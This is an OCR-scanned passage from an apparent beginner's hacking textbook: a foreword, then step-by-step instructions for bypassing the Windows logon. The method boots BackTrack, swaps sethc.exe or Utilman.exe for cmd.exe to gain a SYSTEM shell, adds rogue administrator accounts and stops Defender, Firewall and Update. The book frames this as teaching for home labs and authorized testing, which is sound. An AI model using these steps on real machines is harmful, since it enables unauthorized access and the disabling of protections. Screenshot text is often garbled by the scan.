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Foreword 


Over the years I've found that people come to computer security from very different technical 
backgrounds. Some were programmers, some were network administrators, system administra- 
tors, or database administrators; they worked at an ISP, they came from law enforcement; some 
went to college as computer science majors, some didn’t, and some were even still in high school. 
Some came to the field because they just loved hacking; they could tell you about their first pro- 
gramming language at age 14, and the first time they exploited a vulnerable system when they 
were 16. Some were IT professionals who heard that computer security was where the money 
was—and they were right. 


How It All Started for Me 


I become interested in network security after attending a security conference called Def Con 
(www.defcon.org). It was a great experience and I learned a lot in those 3 days. Soon after Def Con 
I purchased some security books...OK...let me tell the real story. 

I was working as a help desk technician at the time. I had just passed my A+, Network+, 
MCSE, and CCNA certifications. Although I had no real experience outside of explaining to 
people how to right click all day while working on the help desk and the certification exams I had 
recently passed, I really thought I was pretty sharp when it came to computers. My information 
assurance manager asked me if I was going to Def Con. I had never heard of Def Con, but when 
I looked it up on the Web I was really excited about the idea of going to a hacker conference. It 
sounded cool. 

Walking around the hotel where it was held back then was interesting. There was really loud 
techno music everywhere I went and copious amounts of alcohol. Hackers had turned the pool 
purple, poured cement in several toilets, hacked the ATM machines, and paid strippers to run 
through the crowds naked with clear plastic wrap around their bodies. 

I was completely lost when I attended the presentations given by the Def Con speakers. I had 
absolutely no idea what anyone was talking about. I had heard of Linux, but had no idea of what 
it was. I had no idea what OpenBSD was. I found a 17-year-old kid who didn't seem to mind 
explaining to me what all of this stuff was. He patiently answered my n00b questions (What's a 
port scan? What's a buffer overflow? What is Linux?) He was a participant in the hacking competi- 
tion that year, and he took me over to his team’s table. I sat there in amazement—I had absolutely 
no idea what was going on, but I was drawn to it somehow. No one was using Windows, no one 
was using a graphical user interface (GUI); everyone was writing code right there on the fly in the 
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middle of the competition. Although I didn't know what was going on, I somehow knew I wanted 
to be one of these people. I was thoroughly embarrassed because I flat out couldn't play. With all 
of the certifications that I had, I was absolutely clueless about hacking. 

At one point there was guy who wrote a script that changed the ports that attacking teams saw 
as open every 6 seconds. I said to him, “Wow that should buy you guys some time”; he said, “No, 
they figure this out pretty quick.” I sat back in amazement—just speechless. I didn't know what 
to say to that. This was just one of the many things I saw these guys do that I had absolutely no 
idea how to do. I didn't even know where to go to look this stuff up. I mean come on, what do you 
google to learn how to do something like that? 

How are these guys doing this stuff without books, or even without Internet access to look this 
stuff up? I soon realized that they had heard I had all of those certifications and let me sit there 
and watch them hack just to embarrass me. Most people with a lot of computer certifications, as 
they call them, are absolutely clueless when it comes to security, and in my case, they were right. 
It didn't take me long to put my hurt pride aside. I started buying everyone pizza and drinks so 
they would let me just sit and watch. As I said, I was drawn to this stuff for some reason. I had no 
idea what they were doing, but I knew this is what I wanted to do. After the competition was over 
I started asking the guys who were on the team how I could learn to do what they were doing. 
‘They told me to stop using Windows and switch to Linux or BSD, learn to program, then build a 
network of several different operating systems and hack them. 


It's Time for a Change 


When I got home from Def Con I bought several books on Linux, programming, and hacking. 
I rebuilt my home network with installations of Red Hat Linux and FreeBSD without GUIs. I got 
rid of Windows, and started trying to learn how to program in C. I joined a bunch of security 
mailing lists, and I just flat out immersed myself in this stuff. 

Fast forward to today nearly 10 years later. I'm a security consultant and trainer. Now I teach 
almost every day. Sometimes I miss those early days of learning to hack. The security field is very 
different now—it’s grown exponentially, and gone in so many different directions. Even though 
there are many books, tutorials, conferences, and courses, I think it’s actually harder to learn now 
because the field is so big that a lot of beginners have no idea where to start. 

Def Con gave me the kick-start I needed; it gave me direction because I got to see very skilled 
people hack into really complex systems with intense network monitoring by other skilled people 
trying to stop them. That's why I think this book is a good idea. This book won't make you a 
master hacker, but that is not its goal. The goal is to shed some light on Pow hackers do what they 
do, and point beginners in the right direction so they can learn what we do. I think Jesse is a great 
guy and phenomenal teacher, and I hope this book does for you what that Def Con experience 
did for me. 


Joe McCray 
Strategic Security 
Baltimore, Maryland 
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Chapter 1 
Hacking Windows OS 


Introduction 


The word hacker has both positive and negative connotations depending on who you talk to and 
in what context the person is using the word. There are also many levels of hackers, from script 
kiddies to elite hackers. Some countries actively engage in the act of attacking the computer sys- 
tems of other countries; their purpose is to steal intellectual property and government secrets. This 
brings us to another point—hackers are usually divided into three categories: white hat, gray hat, 
and black hat. The white hat hackers use their skills for good, while black hat hackers often do 
“bad things.” The gray hat is somewhere in the middle. I do not encourage people to engage in 
illegal activity under any circumstances. On the other hand, sometimes testing a proof of concept 
in a virtual environment is necessary to “see how the other side operates.” Learning how the bad 
guys do what they do will help us better understand security. 

Like many other people in the industry, I have decided to use my skills to earn an honest liv- 
ing. However, even if you are an honest person, you can have fun doing some hacking as long as 
you are not engaging in illegal activity. My recommendation is for you to set up a test lab at home 
where you can practice these concepts and skills (see Figure 1.1). You can then use these skills 


Figure 1.1 An example home test lab. 
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when you have the legal and written permission of the person or organization you are assisting. In 
summary, hacking is a fun hobby that can turn into a lucrative career as long as you stay on the 
good side of the law. 


Physical Access 


Many people within the computer industry have the opinion that security does not count when 
an attacker has physical access to your computer. I strongly disagree with that opinion; security 
always counts especially when an attacker is able to get physical access to your box. It does not 
have to be "game over" just because an attacker gets physical access to your machines. There are 
measures you can take, such as disk encryption, to secure your computers from physical attack. 
This chapter will discuss what measures can be taken to secure a Microsoft Windows operating 
system and how vulnerable these systems can be when proper precautions are not taken. 

The majority of people who approach a computer at a Windows logon screen are halted in 
their tracks. The average individual figures that without the username and password, there is no 
chance of getting into the system. A skilled hacker with physical access should be able to break 
into a Windows operating system in less than 5 minutes. When a hacker sees this logon screen, 
they know there are several tools they can use to easily get into this system. This chapter will 
discuss several ways to get into a Windows operating system without having the username or the 
password. 


Welcome to Windows 


Microsoft 


Windows: 


n Professional 


Copyright 198 001 


Microsoft Corporation 


Ge Press Ctrl-Alt-Delete to begin. 


Requiring this key combination at startup helps keep your 
computer secure. For more information, click Help. 


At the Windows logon screen, you are "required" to press Control-Alt-Delete to logon to the 
system. If you are at the Welcome screen, you just need to click on the user's name then type in the 
password (if one is required). Average users believe that control-alt-delete is the only key sequence 
that can be used at this screen. Hackers think differendy; they know that hitting shift five times 
will invoke “sticky keys,” and hitting the Windows key and the “U” key will invoke the utility 


manager. 
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Welcome to Windows 


Utility Manager 


Magnifier is not running 
Narrator is running 
On-Screen Keyboard is not running 


StickyKeys 


Pressing the SHIFT key 5 times turns on StickyKeys. StickyKeys lets you use 
the SHIFT, CTRL, ALT, or Windows Logo keys by pressing one key at a time. 
To keep StickyKeys on, click OK. 

To cancel StickyKeys, click Cancel, 

To deactivate the key combination for StickyKeys, click Settings. 


matical n| lock sskto Cancel etting | 


tically when Utility M 


Options for Magnifier 


d 
t Narrator 


These key sequences work in Windows 2000, XP, 2003, Vista, 2008, and Windows 7. Sethc 
.exe and Utliman.exe are the files associated with these Windows programs that can be launched 
prior to logon. The Windows operating system can be easily hacked by locating these files in 
%SYSTEMROOT %\system32 and replacing them with other known good Windows files like 
cmd.exe or explorer.exe. This chapter will guide you on how to use a Live CD to perform these 
steps. However, before you embark on hacking Windows you will need to know how to burn an 


ISO, or disk image file. 


Live CDs 


There are a large variety of Live CDs that can be utilized to assist you in your quest for Windows 
domination. A Live CD is a special utility that can run an entire operating system from the CD, 
and allow the user to access and manipulate files on the hard drive. The website http://www 
Jivecdlist.com provides a good list of many popular Live CDs and links to download the ISO files. 


Edit View Favorites Tools Help 
wee | The LiveCD List 


Ratings Average 
Name bd Rating 


dr de dede Desktop, OS installation 
L$ 00 $1 Desktop, OS installation 
222.7 Desktop, OS installation 
eee dn Desktop 
22241 Securty 
kKkeeke Desktop, OS installation 
2222! Rescue 
PIIII. OS installation, Rescue 
teehee Desktop. OS installation 
i202. Desktop 
EIE System Administration 
42g 4 $i Desktop, OS installation, Rescue 
$444] Desktop 
PIE Desktop 
ooh OS installation, Rescue 
ttt Desktop 


keke Diagnostics, Rescue, Syste 
Administration 


Sax 
Ubuntu 
Damn Small Linux 
Puppy Linux 
BackTrack 
Knoppix 
SystemRescueCD 
Gentoo 
PCLinuxOS 
Suse Linux 


GParted LiveCD 


Feather Linux 
Windows PE 
Elve 


> 9999929292929292 92929 92D 


Ultimate Boot CD 


m 


CÈ @ Internet | Protected Mode: Off 
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Live CDs are extremely useful tools that can be utilized by individuals with good and bad 
intentions. A Live CD will allow network administrators to run Linux on their system without 
installing it or changing any of their system's configurations. Law enforcement can use Live CDs 
like HELIX or KNOPPIX to acquire a forensically sound copy of a hard drive. Pentesters can use 
a distribution like BackTrack to scan networks and computers. And, any Live CD with a browser 
can be utilized by individuals who want to surf the net without leaving any artifacts on their 


hard drive. 


Just Burned My First ISO 


To complete the exercises in this book, I recommend that you download the BackTrack 4 DVD. 
BackTrack is one of the most popular Live CD distributions available, and it has many of the 
tools needed to perform the exercises in this book. The DVD was compiled by Mati Aharoni, 
who provides several training courses on how to use the tools of BackTrack. The training site for 
BackTrack is http://offensive-security.com, and the download site for the ISO file is http://www 
.backtrack-linux.org/. Paste this link in your browser: http://www.backtrack-linux.org/downloads/. 
Then, click the download link to download the BackTrack 4 Beta DVD. BackTrack 4 Beta and 
BackTrack 3 are ideal for performing these exercises because they automount drives. 


@ Downloads | BackTrack Linux - Penetration Testing Distribution - Windows Internet Explorer Joe 
GO- Wl http://www. backtrack-inux.orgidownloads/] v|&|*x| lo Pi 
File Edt View Favortes Tools Help 
x €- 
jp Favorites — lj Downloads | BackTrack Linux - Penetration Testing Dis... FOE) Code oe Pacer Safety~ Tod. @> ” 


BackTrack 4 Beta Release ISO Ish | ma g e 


Download 


BackTrack 4 Beta Release VMWare Image E vmware 


Name: bt4-beta-vm-6.5.1 rar Size: 1 GB 


Download 
MD5: 38acdcbaf6c73d7¢ 


Q Internet fo~ 100% ~ 


Notice that there is an MD5 value to the left of the download link. This value will help us 
ensure that the ISO file has not been tampered with in transit. Hash values such as MD5 will be 
discussed in more detail in Chapter 3. Just to be sure your file was not tampered with during the 
download process, download a hashing tool for Windows, like md5deep. Download and install 
MD5Win32.msi from http://pank.org/ftp/windows/. Navigate to the location on your hard drive 
where you downloaded bt4-beta.iso. Right click on the ISO and select hash file. The hash of the 
btá-beta file should match the hash listed on the website. Mathematically, the chance that these 
files are different is 1 in 1!°. 
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Hash: |7d1eb71474875363735fee1b8a17c1d8 


Once you have downloaded the ISO file, you will need some type of burning software. Nero 
Burning Rom is one of the best burning suites available. However, it is not a free product. (Nero 
does offer a free trial version if you go to their website at http://www.nero.com.) There are also 
many free burning programs that work quite well. Imgburn is a graphical user interface (GUI) 
application that allows users to burn or create ISO files. It can be downloaded from http://www 
imgburn.com. The five steps for burning the BackTrack 4 ISO are as follows: 


1. Download the bt4-beta.iso file from http://www.backtrack-linux.org/downloads/. 
2. Download and install the ImgBurn program from http://www.imgburn.com/. 
3. Open the ImgBurn program and select Write image file to disc. 


&) » (9 


Write image file to disc 


4. Insert a blank DVD into your system. 
5. To select the image file source, click the browse button, navigate to the location on your 


hard drive where you downloaded the bt4-beta ISO file, and click open. Click OK. Click 
the Write image to CD picture. 


File View Mode Tools Help 


Source — TEAC DV-W28EC B.0A (ATA) 
We Di\bts-beta.iso (E Current Profile: DVD-R 


NUT "C ation: 
Browse for a file... pty 


Erasable: No 
: 1509660 (Bootable), Joliet Free Sectors: 2,297,888 
Free Space: 4,706,074,624 bytes 
Free Time: 510:40:38 (MM:SS:FF) 
z 437,396 (MODE1/2048) i " 
orted Write Speeds: 2x, 4x, 6x 8 
895,787,008 bytes Supp p 2x, 4x, 6x 8x 


97:13:71 (MM:SS:FF) Qt Pre-recorded Information: 
Manufacturer ID: RITEKF1 


Recording Management Area Information: 
TEAC DV-W28EC 


Physical Format Information (Last Recorded): 
Settings 
Write Speed: |AUTO =| (MAX 


Copies: 
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When the burning process in finished, the media will automatically eject from your system. You 
can now use the media as a bootable Live CD/DVD. 


Before You Start 


If you are going to use tools to break into someone's operating system, make sure you have the per- 
mission of the computer's owner. Accessing someone's computer system without their permission 
is an unlawful act. Many people who are labeled as "hackers" work in the computer security field; 
turning something you enjoy doing for fun into a full time job is not a bad idea. Many of the jobs 
in the information technology field require a security clearance. There are several levels of security 
clearance; some even require polygraphs. Obtaining a security clearance will require some type 
of background investigation. One of the categories that can exclude you from receiving a security 
clearance is the misuse of information technology systems. This includes the illegal or unauthorized 
entry into an information technology system. So, use your hacker “toolbox” only to break into sys- 
tems that you have been granted permission to access or computers in your home test lab. 

Most computers will boot to a CD or DVD without making any modifications to the BIOS. 
If a computer will not boot to the BackTrack DVD, you may need to make modifications to your 
system's BIOS. On most modern computers, if you press the F8 key as soon as you turn the com- 
puter on, you will be provided with a boot option menu. From this menu, choose the CD/DVD 
drive. If pressing F8 does not provide you with a boot option menu, or your want to permanently 
change the boot order of the devices in your system, you will need to access the computer's BIOS. 
The BIOS setup screen is accessed when a computer is first turned on by hitting a key or a series of 
keys (usually F1, F2, or Delete). When first turned on, the computer usually indicates what the key 
sequence is to enter the BIOS. If you encounter a machine where you are unable to get BIOS on 
a machine, do some googling with the name of the computer manufacturer to find the necessary 
sequence for the machine. A lot of valuable information can be gained or discovered by using the 
search engine Google. For example, if you were looking to find out how to "enter the BIOS on a 
Dell Power Edge,” type that into Google, without quotes. Sometimes, the answer can be located 
more quickly by finding a forum instead of going to the manufacturer's website. 


In some situations, the computers BIOS is password protected. There are several ways that 
hackers, or computer technicians for that matter, can reset the BIOS password. Sometimes there 
is a small jumper on the motherboard located close to the CMOS battery, as seen in Figure 1.2. 
If the jumper is pulled the password will be reset. If a jumper is not present, the CMOS battery 
has to be pulled from the machine. The amount of time that the battery must be removed from 
the system can vary. 
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Figure 1.2 CMOS jumper on the motherboard to reset the BIOS password. 


There is a disadvantage to a hacker removing a jumper or taking the battery out to get into 
the BIOS; if a password has been changed, the person who set the password will know that the 
BIOS has been reset. For example, a colleague of mine changed the settings on his computer that 
required users to enter a BIOS password in order to start the system. It seemed he did not want his 
wife or kids using his high-end system. I explained to him that if the CMOS battery or jumper 
was removed, they would be able to get into his system. He agreed that methods exist to reset 
the BIOS password; however, if his password was reset he would know his system was accessed. 
A more “stealthy” way for a hacker to enter the BIOS is to use a default or “backdoor” password. 
There are lists of BIOS passwords that can be retrieved from the Internet using Google. One of the 
most effective ways to keep people from resetting BIOS passwords is to lock the computer case. 
While most computer case locks can be picked fairly easily, this technique can be used as a deter- 
rent to prevent someone from changing BIOS settings like boot order. However, keep in mind 
that even if the case is locked, if someone has a backdoor or default password, locking the system 
will not prevent them from accessing the system. A simple lock on the computer will not thwart 
a determined attacker. 

After opening the case of some newer computers, you may receive a "Chassis Intrusion 
Detected" message when you put the cover back on and power on the machine. Chassis intrusion 
messages are an annoying feature included in some newer BIOS versions. In most cases, the chassis 
intrusion cable is plugged into a jumper on the motherboard. If you unplug the cable from the 
jumper on the motherboard and place a new jumper (you can always find extras on old mother- 
boards, cards, or hard drives), the alarm should not go off any more. Sometimes, several reboots 
will be necessary. 

After entering the BIOS, a user can navigate around by using the arrow keys (not by using 
the mouse). Manufactures may have opted for use of the keyboard only in the BIOS screen 
to keep novice users from changing important BIOS settings. One incorrect BIOS setting 
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could result in the computer not booting. The layout of the BIOS utility will vary depending 
on the manufacturer. Most BIOS screens have a setting referred to as Boot Device Priority, 
Boot, Startup Sequence, or a similar type setting. The way to change the boot order will also 
vary depending on the BIOS manufacturer. On the BIOS of some systems, hitting Enter 
after selecting the first boot device will pull up a menu that allows you to select from a list 
of choices that can become the new first boot device. Other BIOS setup screens require users 
to use the up and down arrow until you get all of the devices in the order you desire. If the 
hacker is booting to a CD or DVD, the DVD drive should be the first device in the boot 
order. 


BIOS SETUP UTILITY 


ist Boot Device [CDROM] 


On modern computers, the USB thumb drive is also a boot choice, and this option is quickly 
becoming popular. Once the BIOS settings have been changed, the “Save Changes and Exit” 
selection needs to be located from within the BIOS menu. ‘This task can usually be accomplished 
by hitting the F10 key on most systems. Once the BIOS has been modified to boot to the proper 
device, you can boot to your BackTrack DVD or other Live CD. 


Utility Manager 


The Utility Manager was designed to help people with disabilities. For this next exercise, your 
“victim” computer should be running any of the following Microsoft Windows operating sys- 
tems: Windows Vista, Windows 2008 Server, or Windows 7. This attack can even be launched 
against systems utilizing Smart Card and fingerprint readers. If the computer is off, turn it on 
and insert the BackTrack DVD immediately. If the computer is presently at the logon screen, 
insert the DVD and click the shutdown button. If the shutdown selection is not available, you 
will need to put the DVD in the drive and reset the computer. If the computer does not have 
a reset button, just power it off and power it back on again. 
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Sleep 
Hibernate 
Shut down 


Use the following steps to break into the Windows 7 operating system: 


1. Select BT4 Beta Console at the Boot menu. 


p jT. 
pus BETA Carsole no FB 


Hi4 Beta — HSRAMDUMP. 
Wimentest- utility 


2. At the BackTrack 4 Beta menu, login as root with the password of toor. Then type startx to 
launch the GUI. 


= Setting kernel variables (veti t1.d/10-process-security.conf)... 
* Setting kernel variables (/etc/zsysctl.d/uine.sysctl.conf)... 

* fictivating suap... 

* Starting early crypto disks... 

* Starting remaining crypto dis 

* Checking file j 

sck 1.41.3 (12-Oct-2008) 


* Mounting local filesystems... 
* Activating suaplile swap 
ipping firewall: ufu (not enabled). . 
Setting up console font and keymap... 
* Loading ACPI modu 
arting ACPI service: 
Starting systen log daenon 
* Doing Wacom setup 
* Starting kernel log daemon... 
arting system mt 
arting Hardware tion layer hald 


ackTrack 4 Beta bt ttyl 


bt login: root 
a: 
log 
inux bt 2 
* WELCOME 


art KDE 
art FUUM 


sau .renote-exploit .org/ 
# startx_ 


3. Launch the terminal by clicking the black icon to the left of the Firefox icon. 


Bae i ao): WEE | 
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4. View the Windows 7 partitions by typing the command fdisk +1. Typically, you will see one 
NTFS partition for Windows Vista operating systems and two partitions for Windows 7 operating 
systems. Even though the device is listed as /dev/sda2, it is mounted on the system as /mnt/sda2. 
Note: For Vista and XD, it will be /dev/sdal. 


Note: If the computer has IDE (older) drives as opposed to SATA drives, Linux displays 
those disks as hda instead of sda. Replace sda with hda in Steps 5, 6, and 10. 
5. Look for the Windows directory by typing Is /mnt/sda2. 


rootGbt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


[-]| t shell | 


Note: If you do not see the Windows directory, try ls /mnt/sdal, ls /mnt/sda3, and so on, 
until you see the directory. Some computer manufactures add additional partitions for utili- 
ties and restoration purposes. 

6. Change to the Windows directory by typing cd /mnt/sda2/Windows. 
Note: Linux is case sensitive, so you need to use the correct case. 

7. The Utilman.exe file is located in the System32 directory. Type the ls command once again 
to list the contents of the Windows directory. 


|| a£ Shell 
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8. Go into the System32 directory by typing the command cd System32. Keep in mind once 
again that Linux is case sensitive, so you must type the directory as you see it printed on the 
screen. 


es root@bt: /mnt/sda2/Windows/System32 - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


]| ut Shell [ 


9. The System32 directory is the primary location for most of the Windows executables. One 
of these executables, Utilman.exe, launches the Utility Manager. Luckily, this application 
can be launched “prior to logon.” During this step Utilman.exe is renamed to Utilman.bak 
in case the correct file needs to be restored. Then a new Utilman.exe is created by copying 
the cmd.exe file and renaming it Utilman.exe. When the user reaches the logon screen and 
they invoke the Utility Manager, a command prompt will launch. Rename Utilman.exe 
Utilman.bak by typing mv Utilman.exe Utilman.bak. Copy the cmd.exe file by typing 
cp cmd.exe Utilman.exe. 


mma root@bt: /mnt/sda2/Windows/System32 - Shell - Konsole - 


Session Edit View Bookmarks Settings Help 


tilman.exe 


10. Change back to the root directory by typing cd /root. Next, unmount the partition by 
typing umount /dev/sda2. Note that the command to unmount is umount, not unmount. 
Type eject, remove the DVD and close the tray. 

Note: Eject does not work in VMware. Type reboot to restart your computer to your 
Windows 7 operating system. 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


at Shell 


11. To invoke the Utility Manager, either press the Windows key and the letter U or hit the blue 
Ease of Access button in the bottom left hand corner of the screen. A command prompt 
should be displayed. Notice that the title of the command prompt is C:\Windows\system32\ 


utilman.exe. 
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Vindow 
TEMP 
TEMP 
E 


Vindow 


The six integrity levels in Windows 7 and Vista are listed below in order from highest to lowest: 


Installer (software installation) 

System (system processes) 

High (administrators) 

Medium (user) 

Low (Internet Explorer when protected mode is enabled) 
Untrusted (lowest level) 


AW RYN d 


Even though User Account Control is enabled on the exploited machine, the second highest 
level of privilege has been obtained (without clicking the allow button). Once a command prompt 
has been obtained, havoc can be wreaked on the exploited system. Some of the tasks that can be 
accomplished include 


— Adding a user 
— Enabling and disabling users 
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— Changing user passwords 

— Adding users to the administrators group 

— Changing the registry 

— Starting and stopping services 

— Scheduling services 

— Copying, adding, or deleting files and folders 

- Modifying date and time stamps 

— Starting services that allow users to connect remotely 
— Changing port numbers for remote services 

— Disabling the firewall 


All of these tasks will be discussed throughout the chapters in this book. The net user com- 
mand can be utilized to create, activate, and delete users as well as change their passwords. The 
net localgroup command can be used to add users to the administrators group. The following is 
a list of net commands used to manipulate user accounts on the system from the command line: 


— net user haxOr Pa$$wOrd /add: Adds a user account called haxOr with the password 
of Pa$$wOrd. 

- netlocalgroup administrators haxOr /add: Adds the user haxOr to the administrators 
group. The name of the group is “administrators” with an s, not administrator. 

— net user administrator /active:yes: Activates the administrator account, which is dis- 
abled by default on Windows Vista and Windows 7. The administrator account is active 
on Windows Server 2008. 

— net user administrator Pa$$wOrd: Gives the administrative user account the password 
of Pa$$wOrd. 

— net user administrator /comment: “You are Ownd”: Gives the administrator account 
the comment “You are Ownd.” 

— net user guest /active:yes: Activates the guest account, which is disabled by default on 
all Windows versions (except 95, 98, and ME, where it does not exist). 

— net guest Pa$$wOrd: Gives the guest user account the password of Pa$$wOrd. 

- net localgroup administrators guest /add: Adds the user guest to the administrators 


group. 


\s ystemprofile 


>:\Windows\systen32>net user hax@r Pa$$uUrd /add 
e connand completed successfully. 


s\systen32>net localgroup administrator 
1d completed successfully 


ysten32>net user administrator 
id completed successfully. 


>=\Windows\syster net user administrator 
> command comp T essfully. 


>= \Windows usten32» 
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13. Most tasks that a user completes using a GUI can also be completed from a command 
prompt. Many times, a hacker will not have access to a GUI. In order to be effective, 
the skilled hacker will need to be able to complete most tasks from a command line. If 
the explorer command is invoked at the C:\Windows\system32\utilman.exe prompt, the 
Windows Explorer will be displayed. Notice that SYSTEM is listed as the logged-on user. 


IN C Windows system32Nutilman.exe 


"T 


SYSTEM 
Documents 


All Programs Help and Support 


2:46 PM 
5/21/2009 


After opening the Windows Explorer by clicking on the Pearl (Start) and right clicking on 
Computer, the Computer Management console can be opened. By clicking the Users folder under 
Local Users and Groups, the users that were created and managed at the command line will be dis- 
played. Additional users can also be created and managed from the Local Users and Groups console. 


2. Computer Management 
File Action View Help 
e» Af Gis! 


@ Computer Management (Local | Name Full Name Description 
m: pit Tools PE Administrator Built-in account for administ: | U 
Q) Task Scheduler fi Guest Built-in account for guest acc More Actions > 


Él] Event Viewer rou 


F jesse 


gi) Shared Folders 
a ilii Local Users and Groups 
^ Users 
j Groups 
(&) Performance 
ij Device Manager 
4 & Storage Refresh 
{SP Disk Management 


New User... 


= ort List... 

Ei Services and Applications Bp 
View > 
Arrange Icons » 
Line up Icons 
Help 


« m » «1 " , 


Creates a new Local User account. 
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Sticky Keys 


For this next exercise, your "victim" computer should be running any of the following Microsoft 
Windows operating systems: Windows 2000, XP, 2003, Vista, 2008, or Windows 7. This attack can 
even be launched against systems utilizing Smart Card and fingerprint readers. If the computer is 
off, turn it on. If it is locked at a password protected screen, put the BackTrack DVD in and reset the 
machine. When Shift is pressed five times on most every machine running any flavor of Windows, 
Sticky Keys is launched. 


Do you want to turn on Sticky Keys? 


Sticky Keys lets ycu use the SHIFT, CTRL, ALT, or Windows Logo keys by pressing 
one key at a time. The keyboard shortcut to turn on Sticky Keys is to press the 
SHIFT key 5 times. 


h f As nter to disable the k rd shi 


Although it is not the default selection in any version of Windows, Sticky Keys can easily be 
disabled by clicking the Go to the Ease of Access Center to disable the keyboard shortcut link after 
hitting Shift five times. (In operating systems prior to Vista, just click the settings tab.) Remove 
the check from the box that states Turn on Sticky Keys and click Apply. After changing this set- 
ting, Sticky Keys will not launch when Shift is pressed five times. 


——— I (son) Tx? 
[© « Ease of Access Center » Set up Sticky Keys ~ | #9] Search p 


Set up Sticky Keys 


E] Tum on Sticky Keys 
Press keyboard shortcuts (such as CTRL+ALT+DEL) one key at a time. 


Keyboard shortcut 
FE] Turn on Sticky Keys when SHIFT is pressed five times 


When using keyboard shortcuts to turn Ease of Access settings on: 


[V] Display a warning message when turning a setting on 


[V] Make a sound when turning a setting on or off 


Options 

Lock modifier keys when pressed twice in a row 

[V] Turn off Sticky Keys when two keys are pressed at once 
Notifications 

[V] Play a sound when keys are pressed 


[V] Display the Sticky Keys icon on the task bar 


Save Cancel J( Apply J 


Unless the settings are changed on an individual machine, Sticky Keys is a formidable physical 
attack vector for hackers. In order to utilize this attack vector, perform the following steps on the 
system running Microsoft Windows: 


1. Boot the machine to the BackTrack DVD. 


2. Log on as the user root with the password of toor. Type startx to launch the GUI. 
3. Open a terminal by clicking the button to the left of the Firefox icon. 


EAr ANN oe: (2) NEED | 
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4, Type the Linux command fdisk -l to view the partitions on the disk. A single partition con- 
figuration is common; the Windows system files will most likely reside on the first partition. 


[2E] root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


«t Shell | 


5. Even though the device is listed as /dev/sdal, in this case it is mounted to /mnt/sdal. The 
mount command will verify this. The mount command by itself will work fine; the last line 
will give you the relevant information. You can eliminate the extra information by typing 
mount | grep fuse. 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


| mt shell | 


6. Navigate to the System32 directory by typing cd /mnt/sdal/Windows/System32. 

7. Rename sethc.exe to sethc.bak by typing mv sethc.exe sethc.bak. 

8. Copy cmd.exe and name it sethc.exe by typing cp cmd.exe sethc.exe. 

9. Go back to the root directory by typing cd /. Unmount the partition by typing umount/ 
dev/sdal. Eject the CD-ROM and reboot by typing eject & reboot. 


rootGbt: / - Shell - Konsole 


E) æ Shell 


The System32 directory is the location of the sethc.exe, which is the executable file used to launch 
Sticky Keys. This file will be replaced with another Windows executable cmd.exe, which launches 
the command prompt. When the attacker hits Shift five times, the command prompt will launch. 
In Windows Vista and 2008 Server, the command whoami can be typed to view the privileges 
that have been gained using this attack. In other Windows operating systems, such as Windows 
XP and Windows 7, use the set command to view the username. Regardless of the Windows ver- 
sion, the attack will obtain SYSTEM privileges. Notice that the command prompt title bar says 
sethc.exe. 
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n 6.0.6000 1 


oft Corporation 


Once you receive a command prompt with SYSTEM access, it is time to manipulate the 
system. Typing the net user command will enumerate all of the users on the system. The net user 
command can also be used to add, delete, activate, and deactivate user accounts. In this case, the 
only account on the system is disabled. The following are examples of commands that can be used 
to manipulate users on the local system: 


B net user: Enumerates all user accounts on the local system. 
B net user jesse /active:no: Makes the only active account on the system, jesse, inactive. 
B net user jesse: Will verify that the account is disabled. 


BI Administrator: sethe.exe MISTER 


on 6.0.6000] 
oft Corporation. fll right 


net user 


fidministrator Guest 
The command completed with one or more errors. 


IC:\Windows\system32>net user jesse /active:no 


The command completed successfully. 


>: \Windouws\s ystem32>_ 


The net stop command can be utilized by the attacker to render the machine’s protection mecha- 
nism useless. 


net start: Enumerates all user accounts on the local system. 

net stop “Windows Defender”: Stops the Windows Defender service. 
net stop “Windows Firewall”: Stops the Windows Firewall service. 
net stop “Windows Update”: Stops the Windows Update service. 
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Administrator: sethc.exe E J 


Windows Audio 
Windows Audio Endpoint Builder 
Windows Defender 
Windows Error Reporting Service 
Windows E it Log 
Windows wall 
Windows Management Instrumentation 
ndows Modules Installer 
ndor arch 
Windows B 
Windows Update 
Workstation 


The command completed successfully. 


ystem32>net stop indows Defender" 
Defender service stopping. 
Defender service F stopped successfully. 


WindowsNs yste net stop “Windows Firewall" 
Windows '"irew service stopping. 
Windows Firew as stopped successfully. 


WindowsNs >m32 - f “Windows Update" 
Windows Update 'nmuice is topping. 
Windows Update ser > was stopped successfully. 


Windows\s ystem32> 


The net stop “Windows Firewall” command does not work on Windows XP or Windows 2003 
Server. To stop the firewall on an XP or 2003 server-based system, type the following command: 
net stop “Windows Firewall/Internet Connection Sharing (ICS)”. 


Command Prompt 


it ication 
ore ice 
scheduler 
NetBIOS Helper 
wy 
al Services 


DHCI ice 
NAT ice 
Virtu Mount Manager Extended 
ent 
; Defender 
i all, ernet Connection Sharing €XICS»5 
> rumentation 


command completed successfully. 


WINDOWS stem32>net stop ‘Windows Fir l/Internet Connection Sharing < 


The Window 


Systems prior to Windows XP, such as Windows 2000 Professional or Server, do not have built- 
in firewalls. Once this command is typed and the service stops successfully, the Windows XP and 
2003 firewall is inactive. Windows Vista, 2008, and 7 include two interfaces for the firewall, the 
Windows Firewall and the Windows Firewall with Advanced Security. Typing net stop “Windows 
Firewall” does not disable the Windows Firewall with Advanced Security. 

Typing the command wf.msc launches the Windows Firewall with Advanced Security. 
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Windows Firewall with Advanced Security on Local Computer 


ud Windows Firewall with Advanced Security provides enhanced network security for Windows computers. 


© 
S 
e 


9 
© 
L 


o 
© 
@ 


Overview a 
Domain Profile 


Private Profile is Active 


Public Profile 


Windows Firewall is on. 
Inbound connections that do not match a rule are blocked. 
Outbound connections that do not match a rule are allowed. 


Windows Firewall is on. 
Inbound connections that do not match a rule are blocked. 
Outbound connections that do not match a rule are allowed. 


Windows Firewall is on. 
Inbound connections that do not match a rule are blocked. 
Outbound connections that do not match a rule are allowed. 


Windows Firewall Properties «———— 


Even though the net stop “Windows Firewall" command has been issued, the Windows 
Firewall with Advanced Security reports that the firewall is on and that the public profile is active. 
Clicking the Windows Firewall Properties link will allow the user to turn off the firewall for the 
corresponding active profile. 


Private Profile Public Profile | IPsec Settings 


Specify behavior for when a computer is connected to a private 
network location. 


(emen. )| i _ 


J 


Once the active profile setting has been changed to off, the Windows Firewall with Advanced 
